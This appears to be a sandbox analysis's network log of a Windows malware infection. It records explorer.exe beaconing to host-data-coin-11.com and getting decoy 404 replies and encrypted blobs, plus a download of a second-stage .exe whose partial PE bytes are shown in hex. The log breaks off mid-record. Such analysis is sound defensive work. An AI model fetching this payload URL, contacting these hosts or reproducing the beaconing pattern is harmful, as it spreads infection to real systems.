                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:51.196571112 CET17322OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://dlfotbnto.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 160
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:51.319488049 CET17323INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:51 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  47192.168.2.5498545.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:51.744878054 CET17327OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pttknu.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 336
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:51.857640028 CET17328INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:51 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  48192.168.2.5498555.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:51.960377932 CET17329OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://jydxuwn.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 165
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:52.084414959 CET17330INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:52 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 e5 a0 8f 70 bc 57 dd 43 d1 fd 20 82 22 ed c3 90 55 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 46I:82OR&:UPJ%9GpWC "U*c0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  49192.168.2.5498575.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:52.529347897 CET17333OUTGET /files/9993_1641737702_2517.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: data-host-coin-8.com
                                                                                                                                  Jan 11, 2022 23:38:52.633980989 CET17336INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:52 GMT
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Content-Length: 590848
                                                                                                                                  Connection: close
                                                                                                                                  Last-Modified: Sun, 09 Jan 2022 14:15:02 GMT
                                                                                                                                  ETag: "90400-5d526d88d6301"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5e 60 89 17 1a 01 e7 44 1a 01 e7 44 1a 01 e7 44 04 53 63 44 33 01 e7 44 04 53 72 44 07 01 e7 44 04 53 64 44 66 01 e7 44 3d c7 9c 44 1f 01 e7 44 1a 01 e6 44 92 01 e7 44 04 53 6d 44 1b 01 e7 44 04 53 73 44 1b 01 e7 44 04 53 76 44 1b 01 e7 44 52 69 63 68 1a 01 e7 44 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6c 5f 9e 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ec 00 00 00 d4 7b 02 00 00 00 00 9f 1c 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 ab a3 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 84 07 00 3c 00 00 00 00 50 7b 02 f8 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7c 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 ea 00 00 00 10 00 00 00 ec 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 8d 06 00 00 00 01 00 00 8e 06 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 ba 73 02 00 90 07 00 00 86 00 00 00 7e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 fe 00 00 00 50 7b 02 00 00 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 56 33 f6 83 3d 0c 25 bb 02 03 75 0b 56 56 56 56 56 ff 15 40 00 41 00 89 75 fc 8b 45 10 89 45 fc 8b 45 0c 31 45 fc 8b 45 fc 8b 4d 08 89 01 5e c9 c2
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$^`DDDScD3DSrDDSdDfD=DDDDSmDDSsDDSvDDRichDPELl_`{@P|<P{|@.text `.rdata@@.datas~@.rsrcP{@@UQV3=%uVVVVV@AuEEE1EEM^


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  5192.168.2.54987594.102.49.170443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  50192.168.2.5498595.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:55.485929012 CET17948OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://nshrr.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 294
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:55.608002901 CET17949INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:55 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  51192.168.2.5498605.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:55.699357986 CET17950OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pntpge.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 279
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:55.811750889 CET17951INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:55 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  52192.168.2.5498615.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:55.942296028 CET17952OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://tjhxrgmht.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 257
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:56.060374022 CET17952INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:56 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  53192.168.2.5498625.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:56.155796051 CET17953OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hsjdosxpvn.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 191
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:56.277791023 CET17954INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:56 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  54192.168.2.5498635.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:56.378614902 CET17955OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hmflv.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 308
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:56.511914015 CET17956INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:56 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  55192.168.2.5498645.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:56.610223055 CET17957OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://aacuf.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 339
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:56.731837988 CET17957INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
